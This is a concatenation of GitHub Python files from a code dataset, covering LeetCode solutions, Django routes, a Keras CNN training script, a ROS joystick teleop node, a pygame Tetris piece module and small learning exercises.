self.list[random_number]\n\n\n\n\n\n","repo_name":"lht19900714/Leetcode_Solutions","sub_path":"Algorithms/0380_Insert_Delete_GetRandom_O(1)/Python/Insert_Delete_GetRandom_O(1)_Solution_1.py","file_name":"Insert_Delete_GetRandom_O(1)_Solution_1.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42415053171","text":"from django.urls import path\n\nfrom task.views import TaskListCreateView, TaskListView, TaskDetailDestroyView, TaskUpdateView, \\\n switch_complete, switch_tomorrow\n \nfrom task.views import TaskSearchListView, TaskSearchDateListView, TaskSearchDetailDestroyView\n\nurlpatterns = [\n path('list', TaskListView.as_view()),\n path('list/', TaskListCreateView.as_view()),\n path('detail/', TaskDetailDestroyView.as_view()),\n path('detail//update', TaskUpdateView.as_view()),\n path('detail//check', switch_complete),\n path('detail//delay', switch_tomorrow),\n \n path('search//list', TaskSearchListView.as_view()),\n path('search//list/', TaskSearchDateListView.as_view()),\n path('search//detail/', TaskSearchDetailDestroyView.as_view()),\n]\n\n #path('list/repeated', TaskListCreateView.as_view()),\n #path('task/repeated/')\n \n \n","repo_name":"wafflestudio20-5/team6-server","sub_path":"toDoMateProject/task/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72478656248","text":"def solution(distance, rocks, n):\n rocks.sort()\n start, end = 1, distance\n while start <= end:\n middle = (start + end) // 2\n print(\"=========================================\\n\", \"middle:\", middle)\n pre_rock = 0\n count_rock = 0\n mins = float('inf')\n for rock in rocks:\n print(\"\\nrock:\", rock)\n print(rock - pre_rock)\n if middle > rock - pre_rock:\n count_rock += 1\n print(\"count_rock: \", count_rock)\n else:\n mins = min(mins, rock - pre_rock)\n pre_rock = rock\n print(\"pre_rock: 
\", pre_rock)\n if count_rock > n:\n end = middle - 1\n else:\n answer = mins\n start = middle + 1\n return answer\n\n# def solution(distance, rocks, n):\n# rocks.sort()\n# rocks.append(distance)\n# left, right = 0, distance\n# # 바위 사이의 최소거리보다 거리가 작을 경우 돌 삭제.\n# # 거리가 클 경우, 이 값들 중 최솟값을 구해둔다.\n# answer = 0\n# while left <= right:\n# # 이전 돌\n# prev = 0\n# # 돌 거리 최솟값.\n# mins = float(\"inf\")\n# # 제거한 돌 개수\n# removed_rocks = 0\n#\n# # 바위 사이의 최소거리\n# mid = (left + right) // 2\n# # 각 돌을 돌면서 제거할 돌을 찾는다.\n# for i in range(len(rocks)):\n# if rocks[i] - prev < mid:\n# removed_rocks += 1\n# else:\n# mins = min(mins, rocks[i] - prev)\n# prev = rocks[i]\n#\n# # 제거한 돌 개수가 기준보다 많다 = 바위 제거를 줄여야 한다.\n# # 바위 사이 최소거리의 기준을 낮춰야 한다\n# if removed_rocks > n:\n# right = mid - 1\n#\n# # 제거한 돌 개수가 기준보다 적다 = 더 많은 바위 제거가 필요\n# # = 바위 사이 최소거리 기준을 높여야 한다\n# else:\n# answer = mins\n# left = mid + 1\n# return answer\n\nprint(solution(26, [2, 5, 14, 17, 23, 24], 3))\n","repo_name":"eehwan/Algorithm-solutions","sub_path":"Programmers/이분탐색/징검다리.py","file_name":"징검다리.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15774721560","text":"# Load the pre-processed dataset and create data splits\n# Build our own CNN model then train and evaluate it with the data splits\n\nimport json as js\nimport numpy as np\nimport tensorflow as tf\nfrom keras import models\nfrom sklearn.model_selection import train_test_split # Traditional Machine-Learning library\nfrom tensorflow import keras # Use Keras front-end of TensorFlow for modelling\n\nJSON_PATH = \"../preprocess/data.json\" # Pre-processed dataset\nMODEL_PATH = \"models/model.h5\" # Keras model\nTEST_PATH = \"models/tested_model.h5\"\nTRAIN_PATH = \"models/validated_model.h5\"\n\nBATCH_SIZE = 24 # Number of samples the network will see before updating\nDROPOUT = 0.25 # Drops 25% of neurons in the dense layer, forces adaptation\nEPOCHS = 50 # The amount of times the network models the dataset for training\nLEARNING_RATE = 0.0001 # Optimisation Algorithm - Adam\nNUM_KEYWORDS = 22 # Number of mappings in the dataset\n\n\ndef load_dataset(data_path):\n # Load the pre-processed dataset\n with open(data_path, \"r\") as fp:\n data = js.load(fp)\n\n # Extract inputs and targets (Pylists to Numpy arrays)\n X = np.array(data[\"MFCCs\"])\n y = np.array(data[\"labels\"])\n\n return X, y\n\n\ndef get_data_splits(data_path, test_size=0.1, test_validation=0.1):\n # 10% of dataset used for testing purposes\n # 90% of dataset used with X_train and Y_train\n X, y = load_dataset(data_path)\n\n # Create 'train, validation and test' data splits (2-Dimensional array)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size)\n X_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train,\n test_size=test_validation)\n\n # Convert inputs from 2-Dimensional to 3-Dimensional array\n X_train = X_train[..., np.newaxis] # (# segments, 13, 1)\n X_validation = X_validation[..., np.newaxis]\n X_test = X_test[..., np.newaxis]\n\n return X_train, X_validation, X_test, y_train, y_validation, y_test\n\n\ndef build_model(input_shape, learning_rate=LEARNING_RATE, error=\"sparse_categorical_crossentropy\"): # SCC\n # Initialise network\n model = keras.Sequential() # Create a sequential model, convolutional neural network (feed-forward)\n\n # Conv layer 1\n # (# number of filters, # kernel size, # activation, # input shape of first layer, # overfitting)\n 
model.add(keras.layers.Conv2D(64, (3, 3), activation=\"relu\",\n input_shape=input_shape,\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 1\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((3, 3), strides=(2, 2), padding=\"same\"))\n\n # Conv layer 2\n model.add(keras.layers.Conv2D(32, (3, 3), activation=\"relu\",\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 2\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((3, 3), strides=(2, 2), padding=\"same\"))\n\n # Conv layer 3\n model.add(keras.layers.Conv2D(32, (2, 2), activation=\"relu\",\n kernel_regularizer=keras.regularizers.l2(0.001)))\n\n # Normalise, MaxPooling layer 3\n model.add(keras.layers.BatchNormalization())\n model.add(keras.layers.MaxPool2D((2, 2), strides=(2, 2), padding=\"same\"))\n\n # Flatten output of convolutional layers, forward-feed into dense layer then dropout percentage of neurons\n model.add(keras.layers.Flatten())\n model.add(keras.layers.Dense(64, activation=\"relu\"))\n model.add(keras.layers.Dropout(DROPOUT))\n\n # SoftMax classifier\n model.add(keras.layers.Dense(NUM_KEYWORDS, activation=\"softmax\")) # Prediction score [0.1, 0.7, 0.2]\n\n # Compile the model by Keras\n optimizer = keras.optimizers.Adam(learning_rate=learning_rate)\n\n model.compile(\n optimizer=optimizer,\n loss=error,\n metrics=[\"accuracy\"]\n )\n\n # Model statistics overview\n model.summary()\n return model\n\n\ndef main():\n print(\"Loading data splits..\")\n # Load data splits\n X_train, X_validation, X_test, y_train, y_validation, y_test = get_data_splits(JSON_PATH)\n\n print(\"Building CNN model..\")\n # Build CNN model\n # Equally spaced segments = total amount of sample sets / hop length\n # (#segments, # coefficients 13, # information channel of an image, 1)\n input_shape = (X_train.shape[1], X_train.shape[2], X_train.shape[3]) # CNN takes a 3-Dimensional input\n model = build_model(input_shape, LEARNING_RATE)\n\n print(\"Training initial CNN model..\")\n # Train CNN model\n model.fit(X_train, y_train, epochs=EPOCHS, batch_size=BATCH_SIZE,\n validation_data=(X_validation, y_validation))\n\n print(\"Saving initial CNN model..\")\n # Save CNN model\n model.save(MODEL_PATH)\n\n print(\"Loading test CNN model..\")\n # Load CNN model\n test = models.load_model(MODEL_PATH)\n\n print(\"Evaluating test CNN model..\")\n # Evaluate to test the CNN model\n results = test.evaluate(X_test, tf.cast(y_test, tf.float32), batch_size=BATCH_SIZE)\n test_error, test_accuracy = test.evaluate(X_test, y_test)\n print(f\"Test Error: {test_error}, Test Accuracy: {test_accuracy}\")\n\n print(\"Saving test CNN model..\")\n # Save tested CNN model\n test.save(TEST_PATH)\n\n print(\"Loading train CNN model..\")\n # Load CNN test model\n train = models.load_model(TEST_PATH)\n\n print(\"Combining data splits..\")\n # Fully train the CNN test model\n complete_train_X = np.concatenate((X_train, X_validation, X_test))\n complete_train_Y = np.concatenate((y_train, y_validation, y_test))\n\n print(\"Shuffling combined data split for data augmentation..\")\n complete_train_dataset = tf.data.Dataset.from_tensor_slices((complete_train_X, complete_train_Y))\\\n .repeat(count=-1)\\\n .shuffle(100000).batch(BATCH_SIZE)\n\n print(\"Fully training the train CNN model..\")\n history = train.fit(\n complete_train_dataset,\n steps_per_epoch=len(complete_train_X) // BATCH_SIZE,\n epochs=10\n )\n\n print(\"Fully trained model 
evaluation..\")\n # Evaluate to test the trained CNN model\n results = train.evaluate(X_test, tf.cast(y_test, tf.float32), batch_size=BATCH_SIZE)\n test_error, test_accuracy = train.evaluate(X_test, y_test)\n print(f\"Test Error: {test_error}, Test Accuracy: {test_accuracy}\")\n\n print(\"Fully trained CNN model..\")\n # Save fully-trained CNN model\n train.save(TRAIN_PATH)\n\n print(\"Finished.\")\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"stormy99/SheilaAI","sub_path":"devel/process/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70663395450","text":"#! /usr/bin/python\nimport psutil\nimport rospy\nimport subprocess, os, signal\n\nfrom std_msgs.msg import Float64\nfrom sensor_msgs.msg import Joy\n\ndef terminate_process_and_children(p):\n process = psutil.Process(p.pid)\n for sub_process in process.children(recursive=True):\n sub_process.send_signal(signal.SIGINT)\n p.wait() # we wait for children to terminate\n #p.terminate()\n\nclass CarTelop:\n\n def __init__(self):\n ''' '''\n\n # VESC publishers intialization\n self.pub_steer = rospy.Publisher(\"commands/servo/position\",Float64, queue_size = 100)\n self.pub_throttle = rospy.Publisher(\"commands/motor/duty_cycle\", Float64, queue_size = 100)\n self.pub_speed = rospy.Publisher(\"commands/motor/speed\", Float64, queue_size = 100)\n self.joy0_sub = rospy.Subscriber(\"/j0/joy\", Joy, self.joyListenerCallback)\n\n # intialze steering value\n steering_angle = 0.5\n rospy.loginfo(steering_angle)\n self.pub_steer.publish(steering_angle)\n\n # setting up the recording for the rosbag\n self.command = \"rosbag record /rgb/image_raw_color /commands/motor/duty_cycle /commands/servo/position /commands/motor/duty_cycle\"\n self.rosbag_rec = False\n\n rospy.loginfo(\"intializing\")\n # waiting to make sure the all the processes start\n rate = rospy.Rate(2)\n rate.sleep()\n rate.sleep()\n\n self.rcCarTelop()\n\n\n def rcCarTelop(self):\n ''' '''\n # changing rate\n rate = rospy.Rate(10)\n rospy.loginfo(\"starting\")\n\n while not rospy.is_shutdown():\n rate.sleep()\n\n\n def joyListenerCallback(self,data):\n\n acc_multiplier_1 = 1\n acc_multiplier_2 = 1\n\n if data.buttons[6] == 1:\n # acceleration multiplier\n acc_multiplier_1 = 5\n if data.buttons[4] == 1:\n # acceleration multiplier\n acc_multiplier_2 = 2\n if data.buttons[0] == 1 and self.rosbag_rec == False:\n # start recording the bags\n rospy.loginfo(\"start recording the bag file\")\n self.rosbag_process = subprocess.Popen(self.command,shell=True, stdout=subprocess.PIPE)\n self.rosbag_rec = True\n if data.buttons[3] == 1 and self.rosbag_rec == True:\n # reset car and stop recording\n # intialze steering value\n # steering_angle = 0.5\n # #rospy.loginfo(\"steering_angle = 0\")\n # self.pub_steer.publish(steering_angle)\n # # stoping the car\n # #rospy.loginfo(\"speed = 0\")\n # self.pub_speed.publish(0)\n # # terminate the rosbag collection\n rospy.loginfo(\"terminating recording the bag file\")\n terminate_process_and_children(self.rosbag_process)\n self.rosbag_rec = False\n if data.buttons[1] == 1:\n # stop and reset car\n # intialze steering value\n steering_angle = 0.5\n # rospy.loginfo(\"steering_angle = 0\")\n self.pub_steer.publish(steering_angle)\n # stoping the car\n # rospy.loginfo(\"speed = 0\")\n self.pub_speed.publish(0)\n\n duty_cycle_value = 0.1 * data.axes[1] * acc_multiplier_1 * acc_multiplier_2\n 
steering_value = 0.5 - 0.4 * data.axes[2]\n\n log_text = \"steering_angle = \" + str(steering_value) + \" throttle_value = \" + \\\n str(duty_cycle_value)\n\n # rospy.loginfo(log_text)\n self.pub_throttle.publish(duty_cycle_value)\n self.pub_steer.publish(steering_value)\n\n\nif __name__=='__main__':\n try:\n # init ros node\n rospy.init_node('rc_car_telop')\n car_telop = CarTelop()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"chaitanyarajasekhar/rccar_telop","sub_path":"src/telop_joy.py","file_name":"telop_joy.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10713599543","text":"#!/usr/bin/env python\r\n\r\nimport getpass\r\n\r\nname = 'anne'\r\ncolor ='red'\r\nval = 27\r\n\r\n\r\nprint(name, color, val)\r\nprint(name, color, val, sep='.')\r\nprint(f\"My name is {name} and fav color is {color}\")\r\nprint('name', end=\"=>\") #no carriage retrun, \\n is by default\r\nprint(name)\r\n\r\n# must remember to open and close\r\nmary_in = open('DATA/mary.txt') #file object #personal preference to _in for reading and _out for outptu\r\nfor raw_lin in mary_in:\r\n raw_lin= raw_lin.rstrip()\r\n print(raw_lin)\r\nmary_in.close()\r\n\r\n#opens and closes\r\nwith open('DATA/mary.txt') as mary_in:\r\n for raw_lin in mary_in:\r\n raw_lin = raw_lin.rstrip()\r\n print(raw_lin)\r\n\r\nprint(\"***READ***\")\r\nwith open('DATA/mary.txt') as mary_in:\r\n contents = mary_in.read()\r\n print(contents)\r\n\r\nwith open('DATA/mary.txt') as mary_in:\r\n lines = mary_in.readlines() #bad for larger files as all lines get loaded to memory\r\n\r\nfruits = ['apple', 'orange', 'dragonfruit']\r\nwith open('fruits.txt', 'w') as fruits_out:\r\n for fruit in fruits:\r\n fruits_out.write(fruit + '\\n')\r\n\r\n#ask user\r\nfull_name = input(\"Pleas enter your full name?\")\r\nnames = full_name.split()\r\nif (len(names) < 2):\r\n full_name = input(\"thats not your full name, try again:\")\r\n\r\n#password stuff\r\n#password = getpass.getpass(\"Enterpassword:\")","repo_name":"waiteb15/py3forsci3day","sub_path":"io_ex.py","file_name":"io_ex.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14384077686","text":"import random\r\nnum = random.randint(1,10)\r\n\r\nans = int(input('1~10:'))\r\nif num==ans:\r\n print('you guessed it, unlike emily the noob')\r\nelse: \r\n print('you are just like emily-a noob, the answer was',num)\r\n6\r\n ","repo_name":"D4RKFORCE7/python-2020-8","sub_path":"stupid 4.py","file_name":"stupid 4.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"27643308264","text":"# link => https://leetcode.com/problems/the-k-weakest-rows-in-a-matrix/\n\nimport heapq\n\n\nclass Solution:\n # using max heap\n def kWeakestRows(self, mat, k):\n\n res = []\n\n for i, row in enumerate(mat):\n\n sum_ = sum(row)\n heapq.heappush(res, (-sum_, -i))\n if len(res) > k:\n heapq.heappop(res)\n\n ans = []\n while res:\n ans.insert(0, -heapq.heappop(res)[1])\n\n return ans\n\n '''\n def kWeakestRows(self, mat, k):\n\n # by sorting\n for i in range(len(mat)):\n mat[i].append(i)\n\n mat.sort(key=lambda x: sum(x[:-1]))\n\n return [mat[i][-1] for i in range(k)]\n '''\n\n\nprint(Solution().kWeakestRows([[1, 0, 0, 0],\n [1, 1, 1, 1],\n [1, 0, 0, 0],\n [1, 0, 0, 0],\n [1, 1, 0, 0],\n [1, 1, 1, 0]], 
3))\n","repo_name":"simba28/daily-codes","sub_path":"KWeakestRowsInMatrix.py","file_name":"KWeakestRowsInMatrix.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23207054366","text":"import pygame\n\n\nclass Block:\n def __init__(self, board, screen):\n self.board = board\n self.screen_grid = board.grid\n self.screen = screen\n self.block_size = self.board.cell_size\n self.grid_x = 3\n self.grid_y = -1\n self.locked = False\n self.rotation_index = 0\n self.rotation_test = {\n 0: {\n 1: [(0, 0), (-1, 0), (-1, 1), (0, -2), (-1, -2)],\n 3: [(0, 0), (1, 0), (1, 1), (0, -2), (1, -2)],\n },\n 1: {\n 0: [(0, 0), (1, 0), (1, -1), (0, 2), (1, 2)],\n 2: [(0, 0), (1, 0), (1, -1), (0, 2), (1, 2)],\n },\n 2: {\n 1: [(0, 0), (-1, 0), (-1, 1), (0, -2), (-1, -2)],\n 3: [(0, 0), (1, 0), (1, 1), (0, -2), (1, -2)],\n },\n 3: {\n 2: [(0, 0), (-1, 0), (-1, -1), (0, 2), (-1, 2)],\n 0: [(0, 0), (-1, 0), (-1, -1), (0, 2), (-1, 2)],\n }\n }\n\n def get_block_grid(self):\n return self.rotations[self.rotation_index]\n\n def reset(self):\n self.grid_x = 3\n self.grid_y = -1\n self.rotation_index = 0\n\n def hard_drop(self):\n while self.can_move_down():\n self.move_down()\n self.locked = True\n\n def is_blocked_out(self):\n return not self.can_move(self.grid_x, self.grid_y, self.get_block_grid())\n\n # rotation\n def rotate_cw(self):\n target_rotation_index = (self.rotation_index + 1) % 4\n kick = self.can_rotate(target_rotation_index)\n if kick:\n self.grid_x += kick[0]\n self.grid_y += kick[1]\n self.rotation_index = target_rotation_index\n return True\n else:\n return False\n\n def rotate_ccw(self):\n target_rotation_index = (self.rotation_index - 1) % 4\n kick = self.can_rotate(target_rotation_index)\n if kick:\n self.grid_x += kick[0]\n self.grid_y += kick[1]\n self.rotation_index = target_rotation_index\n return True\n else:\n return False\n\n def can_rotate(self, target_rotation_index):\n temp_piece_grid = self.rotations[target_rotation_index]\n tests = self.rotation_test[self.rotation_index][target_rotation_index]\n for x, y in tests:\n if self.can_move(self.grid_x+x, self.grid_y-y, temp_piece_grid):\n return x, -y\n return False\n\n # movement\n def move_down(self):\n if self.can_move_down():\n self.grid_y += 1\n return True\n else:\n return False\n\n def move_right(self):\n if self.can_move_right():\n self.grid_x += 1\n return True\n else:\n return False\n\n def move_left(self):\n if self.can_move_left():\n self.grid_x -= 1\n return True\n else:\n return False\n\n def can_move_down(self):\n return self.can_move(self.grid_x, self.grid_y + 1, self.get_block_grid())\n\n def can_move_right(self):\n return self.can_move(self.grid_x + 1, self.grid_y, self.get_block_grid())\n\n def can_move_left(self):\n return self.can_move(self.grid_x - 1, self.grid_y, self.get_block_grid())\n\n def can_move(self, grid_x, grid_y, piece_grid):\n for y in range(len(piece_grid)):\n for x in range(len(piece_grid)):\n if piece_grid[y][x] > 0:\n try:\n if self.screen_grid[grid_y + y][grid_x + x] != 0 or grid_x + x < 0:\n return False\n except IndexError:\n return False\n return True\n\n # drawing\n def draw_ghost_piece(self):\n ghost_y = None\n block_grid = self.get_block_grid()\n for i in range(1, 50):\n if not self.can_move(self.grid_x, self.grid_y + i, block_grid):\n ghost_y = self.grid_y + i - 1\n break\n for y in range(len(block_grid)):\n for x in range(len(block_grid[0])):\n if block_grid[y][x] > 0:\n real_x = x * 
self.block_size + self.grid_x * self.block_size + self.board.x\n real_y = y * self.block_size + ghost_y * self.block_size + self.board.y\n\n rect = pygame.Surface((self.block_size, self.block_size))\n rect.set_alpha(128)\n rect.fill(self.color)\n self.screen.blit(rect, (real_x, real_y))\n\n def draw_on_board(self):\n block_grid = self.get_block_grid()\n for y in range(len(block_grid)):\n for x in range(len(block_grid[0])):\n if block_grid[y][x] > 0:\n real_x = x * self.block_size + self.grid_x * self.block_size + self.board.x\n real_y = y * self.block_size + self.grid_y * self.block_size + self.board.y\n rect = pygame.Rect(real_x, real_y, self.block_size, self.block_size)\n pygame.draw.rect(self.screen, self.color, rect)\n\n def draw(self, x_offset, y_offset):\n block_grid = self.get_block_grid()\n for block_grid_y in range(len(block_grid)):\n for block_grid_x in range(len(block_grid[0])):\n if block_grid[block_grid_y][block_grid_x] > 0:\n real_x = block_grid_x * self.block_size + x_offset\n real_y = block_grid_y * self.block_size + y_offset\n rect = pygame.Rect(real_x, real_y, self.block_size, self.block_size)\n pygame.draw.rect(self.screen, self.color, rect)\n\n\nclass IBlock(Block):\n color = pygame.Color(\"Turquoise\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.kick_data = {\n 0: {\n 1: [(-2, 0), (1, 0), (-2, -1), (1, 2)],\n 3: [(-1, 0), (2, 0), (-1, 2), (2, -1)],\n },\n 1: {\n 0: [(2, 0), (-1, 0), (2, 1), (-1, 2)],\n 2: [(-1, 0), (2, 0), (-1, 2), (2, -1)],\n },\n 2: {\n 1: [(1, 0), (-2, 0), (1, -2), (-2, 2)],\n 3: [(2, 0), (-1, 0), (2, 1), (-1, -2)],\n },\n 3: {\n 2: [(-2, 0), (1, 0), (-2, -1), (1, 2)],\n 0: [(1, 0), (-2, 0), (1, -2), (-2, 1)],\n }\n }\n self.rotations = [\n [[0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [1, 1, 1, 1],\n [0, 0, 0, 0]],\n\n [[0, 1, 0, 0],\n [0, 1, 0, 0],\n [0, 1, 0, 0],\n [0, 1, 0, 0]],\n ]\n\n\nclass JBlock(Block):\n color = pygame.Color(\"RoyalBlue\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [2, 0, 0, 0],\n [2, 2, 2, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 2, 2, 0],\n [0, 2, 0, 0],\n [0, 2, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [2, 2, 2, 0],\n [0, 0, 2, 0]],\n\n [[0, 0, 0, 0],\n [0, 2, 0, 0],\n [0, 2, 0, 0],\n [2, 2, 0, 0]],\n ]\n\n\nclass LBlock(Block):\n color = pygame.Color(\"Coral\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 0, 3, 0],\n [3, 3, 3, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 3, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [3, 3, 3, 0],\n [3, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [3, 3, 0, 0],\n [0, 3, 0, 0],\n [0, 3, 0, 0]],\n ]\n\n\nclass OBlock(Block):\n color = pygame.Color(\"Gold\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 4, 4, 0],\n [0, 4, 4, 0],\n [0, 0, 0, 0]],\n ]\n\n\nclass SBlock(Block):\n color = pygame.Color(\"LightGreen\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 5, 5, 0],\n [5, 5, 0, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 
5, 0, 0],\n [0, 5, 5, 0],\n [0, 0, 5, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 5, 5, 0],\n [5, 5, 0, 0]],\n\n [[0, 0, 0, 0],\n [5, 0, 0, 0],\n [5, 5, 0, 0],\n [0, 5, 0, 0]],\n ]\n\nclass TBlock(Block):\n color = pygame.Color(\"Orchid\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [6, 6, 6, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [0, 6, 6, 0],\n [0, 6, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [6, 6, 6, 0],\n [0, 6, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 6, 0, 0],\n [6, 6, 0, 0],\n [0, 6, 0, 0]],\n ]\n\n\nclass ZBlock(Block):\n color = pygame.Color(\"OrangeRed\")\n\n def __init__(self, board, screen):\n super().__init__(board, screen)\n self.rotations = [\n [[0, 0, 0, 0],\n [7, 7, 0, 0],\n [0, 7, 7, 0],\n [0, 0, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 7, 0],\n [0, 7, 7, 0],\n [0, 7, 0, 0]],\n\n [[0, 0, 0, 0],\n [0, 0, 0, 0],\n [7, 7, 0, 0],\n [0, 7, 7, 0]],\n\n [[0, 0, 0, 0],\n [0, 7, 0, 0],\n [7, 7, 0, 0],\n [7, 0, 0, 0]],\n ]\n","repo_name":"vonkez/Tetris-pygame","sub_path":"scenes/game/Block.py","file_name":"Block.py","file_ext":"py","file_size_in_byte":10569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32783518857","text":"# Insertion mutation\r\n# Permutation encoding\r\n# for TSP style problems\r\n# C.NELSON 2018\r\n#### THEORY #########\r\n# subject:\r\n# 25036147\r\n# choose a number\r\n# v\r\n# 25036147 [3] value\r\n# choose a position\r\n# | [1] position\r\n# 25036147\r\n# insert value and shift\r\n# remaining values accordingly \r\n# 23506147 = mutated\r\n########################\r\n\r\nimport random\r\n\r\n\r\ndef i_mask(length):\r\n val = random.randrange(length)\r\n pos = random.randrange(length)\r\n if val == pos:\r\n val, pos = i_mask(length)\r\n return val, pos\r\n\r\n\r\ndef insertion(subject):\r\n value, position = i_mask(len(subject))\r\n actual_val = subject[value]\r\n int_subj = list(subject) # interim copy\r\n int_subj.remove(actual_val)\r\n int_subj.insert(position, actual_val)\r\n return int_subj\r\n\r\n\r\nx = insertion(list(\"1234567\"))\r\nprint(x)\r\n","repo_name":"ccnelson/Python","sub_path":"gen_al/mutation/insertion.py","file_name":"insertion.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29467165929","text":"lista=[]\ndef buscarTodas(a,b):\n global x\n global y\n n=len(a)\n g=list(a)\n y=\"\"\n for x in range(0,n):\n h=g[x]\n if h==b:\n lista.append(x)\n print(lista)\n final=\" \".join(str(x) for x in lista)\n return final\n \nif __name__ == \"__main__\":\n f=input(\"ingrese la frase: \")\n l=input(\"ingrese la letra: \")\n buscarTodas(f,l)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema8_ej2/tema8_ej2_3a404eb99342dcad9b2f23e1e08ec05c.py","file_name":"tema8_ej2_3a404eb99342dcad9b2f23e1e08ec05c.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25719780609","text":"\"\"\"Sets the values for displaying supported chars on a Waveshare RGB LED Pico hat (in landscape)\n\nSee code.py (in root) for full details.\n\n\"\"\"\n\nimport re\nfrom random import randint\n\nfrom wsgi_web_app_helpers import get_json_wsgi_input, bad_request\n\n\nclass TooManyCharsException(Exception):\n \"\"\"Oh no, there are too many characters\"\"\"\n\n\n# The index of the nested list is the digit it 
represents\ndigits = {\n 0: [\n [44, 45, 59, 62, 75, 78, 91, 94, 107, 110, 123, 126, 140, 141], # 0\n [44, 45, 46, 61, 77, 93, 109, 125, 126, 141], # 1\n [43, 44, 45, 46, 62, 77, 92, 107, 123, 126, 140, 141], # 2\n [44, 45, 59, 62, 75, 92, 93, 107, 123, 126, 140, 141], # 3....\n [44, 60, 76, 91, 92, 93, 94, 108, 110, 124, 126, 140, 142],\n [44, 45, 46, 59, 75, 92, 93, 94, 110, 126, 139, 140, 141, 142],\n [44, 45, 59, 62, 75, 78, 92, 93, 94, 110, 125, 140],\n [45, 61, 77, 93, 108, 123, 139, 140, 141, 142],\n [44, 45, 59, 62, 75, 78, 92, 93, 107, 110, 123, 126, 140, 141],\n [43, 59, 75, 91, 92, 93, 107, 110, 123, 126, 140, 141],\n [92, 93, 94] # minus\n ],\n 1: [\n [121, 136, 135, 118, 102, 70, 54, 57, 40, 39, 73, 105, 89, 86], # 0\n [40, 41, 42, 57, 73, 89, 105, 121, 122, 137], # 1\n [39, 40, 41, 42, 58, 73, 88, 103, 119, 122, 136, 137], # 2\n [40, 41, 55, 58, 71, 88, 89, 103, 119, 122, 136, 137], # 3....\n [41, 57, 73, 88, 89, 90, 91, 105, 107, 121, 123, 137, 139],\n [40, 41, 42, 55, 71, 88, 89, 90, 106, 122, 135, 136, 137, 138],\n [40, 41, 55, 58, 71, 74, 88, 89, 90, 106, 121, 136],\n [41, 57, 73, 89, 104, 119, 135, 136, 137, 138],\n [39, 40, 54, 57, 70, 73, 87, 88, 102, 105, 118, 121, 135, 136],\n [39, 55, 71, 87, 88, 89, 103, 106, 119, 122, 136, 137],\n 